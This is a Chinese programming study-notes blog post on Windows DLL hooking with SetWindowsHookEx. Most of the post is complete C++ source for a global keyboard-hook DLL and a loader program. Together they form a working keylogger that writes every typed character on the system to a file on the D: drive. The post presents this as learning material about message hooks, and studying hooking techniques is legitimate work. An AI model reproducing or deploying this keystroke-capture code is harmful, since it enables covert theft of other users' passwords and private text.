美文网首页
学习记录1

学习记录1

作者: TimeMage | 来源:发表于2016-12-27 19:24 被阅读52次

DLL钩取

钩取就是在系统和应用之间设立岗哨,偷窥或截取消息的手段。
钩取不适用的情况:应用不受事件驱动。
为什么能实现钩取?
原因:
第一、windows的消息机制

msg.jpg
第二、windows自带的API SetWindowsHookEx()
setwindowshook.jpg
代码
KeyHook.cpp
//注:64位dll 只能钩取64位进程 32位dll 只能钩取32位进程
#include "stdio.h"
#include "windows.h"

#define DEF_PROCESS_NAME        "notepad.exe"

HINSTANCE g_hInstance = NULL;
HHOOK g_hHook = NULL;
HWND g_hWnd = NULL;

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    switch( dwReason )
    {
        case DLL_PROCESS_ATTACH:
            g_hInstance = hinstDLL;
            break;

        case DLL_PROCESS_DETACH:
            break;  
    }

    return TRUE;
}

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    FILE *fl;
    char szPath[MAX_PATH] = {0,};
    char *p = NULL;
    char ch;
    if( nCode == HC_ACTION )
    {
        // bit 31 : 0 => press, 1 => release
        if( lParam & 0x40000000 )
        {
            if( (wParam==VK_SPACE)||(wParam==VK_RETURN)||(wParam>0x2f&&wParam<=0xDE))
            {
                fl = fopen("D:\log.txt","a");//必须是绝对地址
                if (wParam==VK_RETURN)
                        ch='\n';
                else
                  {
                        BYTE ks[256];
                        GetKeyboardState(ks);
                        WORD w;
                        UINT scan=0;
                        ToAscii(wParam,scan,ks,&w,0);
                        ch =char(w); 
                  }
                fputc(ch,fl);
                fclose(fl);
            }
        }
    }
    return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}

#ifdef __cplusplus
extern "C" {
#endif
    __declspec(dllexport) void HookStart()
    {
        g_hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstance, 0);
    }

    __declspec(dllexport) void HookStop()
    {
        if( g_hHook )
        {
            UnhookWindowsHookEx(g_hHook);
            g_hHook = NULL;
        }
    }
#ifdef __cplusplus
}
#endif

HookMain.cpp

#include "stdio.h"
#include "conio.h"
#include "windows.h"

#define DEF_DLL_NAME        "KeyHook.dll"
#define DEF_HOOKSTART       "HookStart"
#define DEF_HOOKSTOP        "HookStop"

typedef void (*PFN_HOOKSTART)();
typedef void (*PFN_HOOKSTOP)();

void main()
{
    HMODULE         hDll = NULL;
    PFN_HOOKSTART   HookStart = NULL;
    PFN_HOOKSTOP    HookStop = NULL;
    char            ch = 0;

    hDll = LoadLibraryA(DEF_DLL_NAME);
    if( hDll == NULL )
    {
        printf("LoadLibrary(%s) failed!!! [%d]", DEF_DLL_NAME, GetLastError());
        return;
    }

    HookStart = (PFN_HOOKSTART)GetProcAddress(hDll, DEF_HOOKSTART);
    HookStop = (PFN_HOOKSTOP)GetProcAddress(hDll, DEF_HOOKSTOP);

    HookStart();

    printf("press 'q' to quit!\n");
    while( _getch() != 'q' )    ;

    HookStop();

    FreeLibrary(hDll);
}

相关文章

  • 学习记录1

    DLL钩取 钩取就是在系统和应用之间设立岗哨,偷窥或截取消息的手段。钩取不适用的情况:应用不受事件驱动。为什么能实...

  • 学习记录(1)

    Update 函数中修改移动控制的代码,没帧调用一次(大概),定义一个受保护的(protected)变量m_tra...

  • 学习记录1

    Although the residents of this remote community are short...

  • 学习记录1

    一、昨晚失眠到深夜。一直等到凌晨1点左右才睡着,这个过程当中在手机上翻看我喜欢的简述,看到关注的作者更新了无数的文...

  • 学习记录1

    1.尊重伴侣和其他家庭成员的养育方式,相信孩子的适应能力。不要把自己的养育观点强加给其他人。 2.孩子的观察能力很...

  • 学习记录1

    今天孩子写语文作业,对于文章的寓意这一块,感受还是比较浅,或者说还是对生活体悟不够? 比如说今天的作业有一题:说做...

  • 学习记录1

    本次作业: 1. 继续用优势教育的眼光去挖掘孩子的优点,并且表扬她。 ……今天又带他一起出去学习,值得表扬的是去之...

  • 学习xgboost记录1

    原文链接:https://machinelearningmastery.com/xgboost-python-mi...

  • 进程学习记录1

    跨平台的进程创建模块 1.方法一: 使用 Process 类创建子进程 支持跨平台:windows / linux...

  • Flutter 学习记录1

    Flutter是谷歌的移动UI框架,可以快速在iOS和Android上构建高质量的原生用户界面。 Flutter可...

网友评论

      本文标题:学习记录1

      本文链接:https://www.haomeiwen.com/subject/areevttx.html